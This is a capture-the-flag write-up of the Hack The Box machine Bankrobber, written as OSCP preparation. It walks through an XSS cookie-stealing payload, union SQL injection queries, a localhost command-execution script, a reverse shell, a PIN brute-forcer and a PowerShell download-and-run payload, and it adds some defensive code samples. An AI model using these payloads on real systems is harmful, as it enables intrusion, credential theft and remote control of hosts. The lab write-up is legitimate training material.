Hack The Box: Bankrobber Write-up (#26)

This is my 26th box out of 42 boxes for OSCP preparation. I am doing my best to learn and master the key skills for my upcoming OSCP exam by writing this series of blogs. So let’s begin.

Reconnaissance

./nmapAutomater 10.10.10.154 All
  • All: Runs all the scans consecutively (~20–30 minutes)

We get back the following result:

Running all scans on 10.10.10.154
Host is likely running Windows
---------------------Starting Nmap Quick Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:28 +08
Nmap scan report for 10.10.10.154
Host is up (0.0096s latency).
Not shown: 996 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds
---------------------Starting Nmap Basic Scan---------------------
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:28 +08
Nmap scan report for 10.10.10.154
Host is up (0.015s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
443/tcp open ssl/http Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b PHP/7.3.4)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b PHP/7.3.4
|_http-title: E-coin
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
Service Info: Host: BANKROBBER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h00m00s, deviation: 0s, median: 59m59s
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-29T03:28:46
|_ start_date: 2020-09-29T03:28:14
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.99 seconds
----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:29 +08
Nmap scan report for 10.10.10.154
Host is up.
All 1000 scanned ports on 10.10.10.154 are open|filtered
Nmap done: 1 IP address (1 host up) scanned in 201.67 seconds
---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:32 +08
Initiating Parallel DNS resolution of 1 host. at 10:32
Completed Parallel DNS resolution of 1 host. at 10:32, 0.01s elapsed
Initiating SYN Stealth Scan at 10:32
Scanning 10.10.10.154 [65535 ports]
Discovered open port 445/tcp on 10.10.10.154
Discovered open port 3306/tcp on 10.10.10.154
Discovered open port 443/tcp on 10.10.10.154
Discovered open port 80/tcp on 10.10.10.154
SYN Stealth Scan Timing: About 11.58% done; ETC: 10:37 (0:03:57 remaining)
SYN Stealth Scan Timing: About 23.01% done; ETC: 10:37 (0:03:24 remaining)
SYN Stealth Scan Timing: About 34.43% done; ETC: 10:37 (0:02:53 remaining)
SYN Stealth Scan Timing: About 45.86% done; ETC: 10:37 (0:02:23 remaining)
SYN Stealth Scan Timing: About 57.28% done; ETC: 10:37 (0:01:53 remaining)
SYN Stealth Scan Timing: About 68.71% done; ETC: 10:37 (0:01:22 remaining)
SYN Stealth Scan Timing: About 80.14% done; ETC: 10:37 (0:00:52 remaining)
Completed SYN Stealth Scan at 10:37, 262.69s elapsed (65535 total ports)
Nmap scan report for 10.10.10.154
Host is up (0.0073s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 262.77 seconds
Raw packets sent: 131274 (5.776MB) | Rcvd: 212 (9.328KB)
Starting smbmap scan

[!] Authentication error on 10.10.10.154
Finished smbmap scan

=========================

Starting smbclient scan

session setup failed: NT_STATUS_LOGON_FAILURE
Finished smbclient scan

=========================

Starting nmap scan

Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:58 +08
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.154
Host is up (0.0078s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try
Nmap done: 1 IP address (1 host up) scanned in 47.60 seconds
Finished nmap scan

=========================

---------------------Finished all Nmap scans---------------------

We have 4 open ports.

  • Port 80: running HTTP, Apache httpd 2.4.39.
  • Port 443: running HTTPS, Apache httpd 2.4.39.
  • Port 445: running the SMB service.
  • Port 3306: running the MySQL service.

Before we begin, let’s make quick mental notes.

  • Ports 80/443 are web services; we enumerate the web pages and look for hidden directories that may contain sensitive information. Since Apache is running on Windows instead of IIS, it is probably part of a XAMPP installation. We’ll also test for SQL injection, since the MySQL port is open.
  • The SMB service returned nothing interesting from the nmapAutomater scan. We will scan it manually if required.
  • For MySQL, we need credentials to log in from the console. If we find any, we will try them. If the database only accepts connections from localhost, those credentials can still be used during post-exploitation enumeration.

Service Enumeration

Port 80/443 (HTTP/HTTPS)

Let’s check the CVEs associated with this version.

It is vulnerable to cross-site scripting per CVE-2019-10092. Take note of this.

Next, visit the index page.

We have a login page; click on it. I tried common and weak credentials, but none of them worked. Let’s register an account for ourselves.

Account is successfully registered.

Let’s login with our credentials.

Nice. Now we have the option to transfer e-coins. Let’s test for an XSS vulnerability.

Once we click “TRANSFER E-COIN” we get a pop-up message saying the admin will review our transfer.

This is a good hint. Chances are the admin will log in to this page, and his cookies will be available while he still has an active session. Let’s look at the cookies this site stores for us.

It is a base64-encoded cookie. Let’s decode it on our Kali Linux to confirm it matches our credentials.

root@kali:~# echo 'am9zaHVh' | base64 -d
joshua

It is! Now we need visibility into the XSS vulnerability. We will call our simple web server from an XSS payload in the comment field. First, start a simple Python web server on our Kali.

python3 -m http.server 80

Next type the following line of code in comment field and click “TRANSFER E-COIN”.

Check back on our web server: we have a response from the target.

Nice! Let’s create a proper payload that steals the cookie whenever the admin logs in and sends it to our web server.

<img src=x onerror=this.src="http://10.10.14.14/?cookie="+btoa(document.cookie) />
  • btoa: converts the cookie to a base64-encoded string so the data survives in the URL.

For more payloads related to XSS please refer here. Paste the above code into the comment field and click the transfer button. Make sure your python3 web server is up.

After a few minutes, we get a response on our web server with the cookie.

Let’s copy it and decode it.

root@kali:/htb/BankRobber# echo -n 'dXNlcm5hbWU9WVdSdGFXNCUzRDsgcGFzc3dvcmQ9U0c5d1pXeGxjM055YjIxaGJuUnBZdyUzRCUzRDsgaWQ9MQ==' | base64 -d
username=YWRtaW4%3D; password=SG9wZWxlc3Nyb21hbnRpYw%3D%3D; id=1
root@kali:/htb/BankRobber# echo 'YWRtaW4=' | base64 -d
admin
root@kali:/htb/BankRobber# echo 'SG9wZWxlc3Nyb21hbnRpYw==' | base64 -d
Hopelessromantic

Nice! We have recovered the admin/Hopelessromantic credentials. Next, let’s use them to log in.
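As an added example (my code, not part of the write-up), here is the cookie format recovered above parsed in Python, followed by what a session cookie should look like instead: an opaque, server-signed token that carries no password. The sample cookie value, the user "demo"/"password123" and the helper names are constructed for this example; the HMAC key is assumed to live only on the server.

```python
import base64
import hashlib
import hmac
import secrets
from urllib.parse import unquote

# Constructed sample in the same shape as the cookie recovered above:
# base64( "username=<base64,url-encoded>; password=<base64,url-encoded>; id=<n>" ).
# The values (demo / password123 / 7) are made up for this example.
SAMPLE_COOKIE = base64.b64encode(
    b"username=ZGVtbw%3D%3D; password=cGFzc3dvcmQxMjM%3D; id=7"
).decode()


def decode_ecoin_cookie(blob: str) -> dict:
    """Peel the outer base64 layer, then URL-decode and base64-decode each field.

    Returns e.g. {"username": "demo", "password": "password123", "id": "7"}.
    The point for a reviewer: the "session" is just the credentials, reversibly
    encoded, so anyone who can read document.cookie (as the XSS above does) has them.
    """
    outer = base64.b64decode(blob).decode()
    fields = {}
    for part in outer.split("; "):
        key, _, value = part.partition("=")
        value = unquote(value)  # %3D -> '='
        if key in ("username", "password"):
            value = base64.b64decode(value).decode()
        fields[key] = value
    return fields


# Hardened alternative. Assumption: this key exists only on the server.
SERVER_KEY = secrets.token_bytes(32)


def issue_session(user_id: int, key: bytes = SERVER_KEY) -> str:
    """Opaque token: user id + random nonce + HMAC-SHA256 tag. No password inside."""
    nonce = secrets.token_hex(16)
    payload = f"{user_id}.{nonce}"
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}.{tag}"


def verify_session(token: str, key: bytes = SERVER_KEY):
    """Return the user id if the tag verifies, otherwise None."""
    try:
        user_id, nonce, tag = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(key, f"{user_id}.{nonce}".encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return int(user_id) if user_id.isdigit() else None


if __name__ == "__main__":
    print(decode_ecoin_cookie(SAMPLE_COOKIE))
    tok = issue_session(7)
    print(tok, verify_session(tok))
```

Even a signed token is still readable by injected script unless the cookie is set with the HttpOnly flag, so the fix on this box is two-fold: stop reflecting the comment field unescaped into the admin's page, and stop putting credentials into the cookie at all.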

We’re in! Let’s test this ID field for SQL injection.

We can retrieve user information by changing the ID value. Fire up Burp proxy and intercept the request.

The “term” parameter looks interesting. Let’s insert a single quote and see if the backend returns an error.

So we have an error. Complete the single quote with “-- -” (a SQL comment) and see if that resolves the error.

It does. Now we have confirmation that a SQL injection vulnerability exists.

Let’s enumerate the database.

Enumerate the database version.

MariaDB version 10.1.30 is running on the target.

Find the number of columns with an ORDER BY clause.

If we go beyond 3 it throws an error, so we have confirmed that the column count is 3.

Find which columns display data with a UNION clause.

Only the first and second columns display data.

Retrieve the database name.

' union all select schema_name,2,3 from information_schema.schemata;-- -

We have the database name bankrobber.

Retrieve table names.

' union all select table_name,2,3 from information_schema.tables where table_schema='bankrobber';-- -

We have a table named users.

Next, retrieve column names from the users table.

' union all select column_name,2,3 from information_schema.columns where table_name='users';-- -

We have username and password columns.

Retrieve data from the columns.

' union all select username,password,3 from users;-- -

We have discovered another user’s credentials, gia/gio. We are done with the bankrobber database. Let’s find out which user is running the database service.

It is root@localhost. Let’s look for system credentials in the mysql.user table.

The password is hashed. Let’s use CrackStation to crack it.

We recovered the root password Welkom1!. So far we have user credentials and database information.
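As an added example (mine, not the box's code or the author's), the union-based injection above is reproduced against a constructed in-memory SQLite database in Python, with the concatenated query placed beside its parameterized form. The schema, the accounts table and the admin password value are made up; the payload is the one from the write-up with the trailing semicolon dropped.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the bank's database; not the box's schema or data."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'S3cr3t!'), (2, 'gia', 'gio');
        CREATE TABLE accounts (id INTEGER, owner TEXT, balance INTEGER);
        INSERT INTO accounts VALUES (1, 'admin', 1000), (2, 'gia', 250);
        """
    )
    return db


def search_vulnerable(db: sqlite3.Connection, term: str) -> list:
    """A search like the 'term' parameter when user input is concatenated into the SQL text.

    Three columns are selected, which is why the UNION payload needs exactly three.
    """
    sql = f"SELECT id, owner, balance FROM accounts WHERE owner LIKE '%{term}%'"
    return db.execute(sql).fetchall()


def search_safe(db: sqlite3.Connection, term: str) -> list:
    """Same query with a bound parameter: the value is sent separately and never parsed as SQL."""
    sql = "SELECT id, owner, balance FROM accounts WHERE owner LIKE ?"
    return db.execute(sql, (f"%{term}%",)).fetchall()


# The write-up's final payload, minus the trailing ';'. The closing quote and
# trailing '%' of the template end up inside the '-- -' comment.
PAYLOAD = "' UNION ALL SELECT username, password, 3 FROM users -- -"


if __name__ == "__main__":
    db = build_demo_db()
    print(search_vulnerable(db, PAYLOAD))  # account rows plus every row of users
    print(search_safe(db, PAYLOAD))        # []
```

Against the concatenated query the payload returns the two account rows followed by both users rows, passwords included; against the parameterized query it is just an unlikely search string and matches nothing.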

We already guessed that this host is running XAMPP, whose default web root is C:\xampp\htdocs\. Let’s try to read a file with the LOAD_FILE function.

We are able to read files. Next, let’s test writing a file into the web root directory.

It seems to have been written. Let’s read the file back to confirm.

But when I tried to test the cmd parameter, it said the file was not found. I tried a few other ways; all returned the same.

So I am not sure what weird thing is happening. Next on the list we have backdoorchecker, which lists files. Let’s try to run the dir command.

Here it says it can only be run from localhost, so our IP is not allowed to run commands. To run a command we need to find a way to issue it from localhost. We can do this with a simple JavaScript file.

Create a file called rce.js with the following code in the current working directory.

root@kali:/htb/BankRobber# cat rce.js
// Runs inside the admin's browser, so the request originates from localhost.
var xhr = new XMLHttpRequest();
var url = "http://localhost/admin/backdoorchecker.php";
// The dir command from above, with a ping appended so we can observe execution.
var param = "cmd=dir | ping -n 1 10.10.14.2";
xhr.open("POST", url);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.withCredentials = true; // send the admin's session cookie with the request
xhr.send(param);

What happens is that when the target’s browser loads this file, the request is sent from localhost, so the ping command is executed and reaches back to our machine.

Set a python web server.

python3 -m http.server 80

Open another window and run tcpdump to capture only ICMP packets.

tcpdump -i tun0 icmp

Now execute the XSS payload in the comment field.

<script src="http://10.10.14.2/rce.js"></script>

In the admin panel, we can see the request is pending the admin’s approval.

After a minute, check the web server and tcpdump windows.

We have RCE!

Let’s create a proper payload to get a reverse shell.

Exploitation

cp ../../opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1

Add the following line to the end of the script with the Kali Linux machine configuration settings.

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 53

When called, this sends a reverse shell back to our Kali Linux on port 53.

Set up a Netcat listener on Kali Linux.

nc -nlvp 53

Set a web server.

python3 -m http.server 80

Now edit the rce.js file and update the param value as below.

Execute the same XSS payload in the comment field.

We have a reverse shell in the context of user Cortin.

Grab the user.txt flag.

Post-Exploitation Enumeration

Run the script.

./winPEAS.bat

After reviewing the script output, port 910 catches my attention.

It is listening on all interfaces, but didn’t show up in the Nmap scan results. Let’s forward this port to our Kali and enumerate it.

We’ll use chisel for port forwarding. Download chisel for Windows and for Linux x64. Once downloaded, unarchive them. Give execute permission to the Linux version of chisel. Transfer the Windows version to the target machine. To transfer files between Kali Linux and a Windows target, refer to my Jeeves write-up.

In Kali, run the following command.

./chisel_1.7.1_linux_amd64 server --port 5555 --reverse

On the target machine run the following command.

/chisel.exe client 10.10.14.2:5555 R:910:127.0.0.1:910

Check back on Kali Linux: we have a connection.

Check the connection.

We have established a stable tunnel. Let’s connect to this port from our localhost.

It looks like a bank application that requires a 4-digit PIN to log in. I tried simple PINs but they did not work. Let’s write a simple Python script with the pwntools module that brute-forces the PIN for us.

root@kali:/htb/BankRobber# cat bruteforce.py
from pwn import *

# Try every 4-digit PIN from 0000 to 9999. The service prompts with '[$] '
# and answers 'Access denied' to a wrong guess; the first other reply is the hit.
for i in range(10000):
    pin = str(i).zfill(4)
    conn = remote('localhost', 910)
    conn.recvuntil(b'[$] ')
    conn.sendline(pin.encode())
    response = conn.recvline()
    conn.close()
    if b'Access denied' not in response:
        print(pin)
        break

Run the script.

We get the PIN. Let’s try it out.

It works! Now we have the option to key in an amount. Once entered, it executes the transfer.exe file. Let’s try to overflow the amount input and see what happens. I have created a 50-character-long string of A’s using Python as below.

Input this into the amount field.

It overflows. Let’s make the input more reasonable. After I tried a few inputs, 32 A’s gives us the correct offset.

Let’s put a ping command after the 32 A’s and expect the application to execute it. Before that, start tcpdump in a new window. Run the command.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAping -n 1 10.10.14.2

Check back on tcpdump.

We have RCE again! Let’s run shell.ps1 once more.

First set a listener.

nc -nlvp 53

Make sure the web server is running. Then enter the following payload in the amount field.

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApowershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.2/shell.ps1')"

Check back on the listener.

We have a SYSTEM shell! Grab the root.txt flag.
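As an added example (my code, not the box's service or the author's), here is a Python model of the two weaknesses in the port-910 application: the PIN check that accepted unlimited guesses (the brute-force above needed at most 10,000 connections), and the amount field whose bytes past offset 32 were handed to a shell. PinGate, brute_force, amount_is_valid and build_transfer_argv are hypothetical names; the lockout threshold, the PIN value 0042 and the "1 to 9 digits" amount format are assumptions for the example.

```python
import hmac
import re

AMOUNT_RE = re.compile(r"[0-9]{1,9}")


class PinGate:
    """PIN check for a service like the one on port 910 (constructed, not the box's code).

    max_attempts=None reproduces the weak behaviour the brute-force relied on:
    unlimited guesses. A small limit turns 10,000 possibilities into a dead end.
    """

    def __init__(self, pin: str, max_attempts=None):
        self._pin = pin.encode()
        self.max_attempts = max_attempts
        self.failures = 0
        self.locked = False

    def check(self, attempt: str) -> bool:
        if self.locked:
            return False
        # Constant-time compare so response timing does not leak matching prefixes.
        if hmac.compare_digest(self._pin, attempt.encode()):
            self.failures = 0
            return True
        self.failures += 1
        if self.max_attempts is not None and self.failures >= self.max_attempts:
            self.locked = True
        return False


def brute_force(gate: PinGate):
    """The loop from bruteforce.py, run in-process against the gate. Returns the PIN or None."""
    for i in range(10000):
        pin = f"{i:04d}"
        if gate.check(pin):
            return pin
        if gate.locked:
            return None
    return None


def amount_is_valid(amount: str) -> bool:
    """Allow-list the amount: digits only, bounded length. Nothing else reaches transfer.exe."""
    return AMOUNT_RE.fullmatch(amount) is not None


def build_transfer_argv(amount: str) -> list:
    """Pass the validated amount as its own argv element instead of through a shell string.

    With an argument vector there is no shell to interpret a trailing command,
    and the length bound means no fixed-size buffer is overrun.
    """
    if not amount_is_valid(amount):
        raise ValueError("amount must be 1 to 9 digits")
    return ["transfer.exe", amount]


if __name__ == "__main__":
    print(brute_force(PinGate("0042")))                  # weak gate: "0042"
    print(brute_force(PinGate("0042", max_attempts=5)))  # hardened gate: None
    print(build_transfer_argv("100"))
```

The weak gate gives up the PIN after 43 guesses; the hardened one locks after five failures and the same loop returns nothing. For the amount field, the 32 A's plus a command fails the allow-list before any process is started, which is the check transfer.exe evidently lacked.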

Attack Strategy Map

Thank you for reading :-) Next box is Popcorn.

I am a security enthusiast. Learning new things every day for a joy. I love ethical hacking. I am deeply loved by God.